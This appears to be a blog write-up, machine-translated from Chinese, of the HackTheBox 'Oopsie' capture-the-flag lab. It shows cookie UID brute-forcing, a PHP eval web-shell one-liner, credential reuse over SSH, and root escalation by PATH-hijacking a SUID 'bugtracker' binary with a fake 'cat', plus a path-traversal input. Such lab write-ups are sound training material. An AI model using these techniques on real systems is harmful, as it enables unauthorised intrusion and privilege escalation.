Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban
HomeArchives

HackTheBox [Oopsie] WriteUp

17
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The task involves exploiting a web application on HackTheBox. After accessing the login page, the user can log in as a guest and discover a user ID (UID) through cookie analysis. By brute-forcing the UID, they find the admin's UID and gain access to an upload interface, where they upload a PHP shell. Once the shell is uploaded, they connect to it but note that it may be cleaned periodically. They find a database configuration file that reveals a username and password, allowing them to SSH into the system. For privilege escalation, they exploit a SUID executable called `bugtracker` that allows them to manipulate the `cat` command. By creating a custom `cat` in a temporary directory and modifying the `PATH` environment variable, they gain root access. They can then read the flags using alternative commands like `head`. Additionally, there is an alternative method to read the root flag by directly executing `bugtracker` with a crafted bug ID that points to the flag file.

image

GetShell#

Access port 80, view the source code, and find the path http://10.129.230.107/cdn-cgi/login/, which is the backend management address, allowing direct Guest login.

After logging in, two additional Cookies are found, among which user should correspond to the UID. Use Burp to brute force it. There is a hint in HTB that it is a 5-digit number, and the last digit is 2, so the brute force volume is not too large, and it can be completed in at most 9000 attempts.

The brute force reveals that the admin's UID is 34322, and access to the upload interface is available, allowing for a direct upload of a one-liner.

<?php eval($_REQUEST['1']);

The uploaded path is http://10.129.230.107/uploads/filename.php, and it can be successfully connected using AntSword, but it seems to be cleaned periodically.

After checking the source code, the database configuration file /var/www/html/cdn-cgi/login/db.php is found, which contains a user robert and a password.

Using this user for SSH brute force, successful login is achieved, and GetShell is successful.

Privilege Escalation#

It is found that the user has an executable file bugtracker that can be used directly. The principle should be that the program grants cat SUID, allowing the cat command to access any file. However, this cat is not the absolute path /bin/cat, so the environment variable can be modified to control the content of cat, achieving privilege escalation.

First, create a folder /tmp/test, then create a cat file in /tmp/test with the following content.

/bin/bash

Grant executable permissions to cat.

chmod +x cat

Modify the environment variable.

export PATH=/tmp/test:/bin:/usr/bin
which cat

At this point, cat has become a root privilege shell, and executing bugtracker will successfully escalate privileges. However, to view the flag, cat can no longer be used; head or other commands can be used instead.

head /home/robert/user.txt
head /root/root.txt

However, this challenge can also be solved without this method; as long as the root flag file name can be guessed, similar to arbitrary file reading, bugtracker can be executed directly, and the bug ID can be filled with ../../../root/root.txt, allowing the flag to be read.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.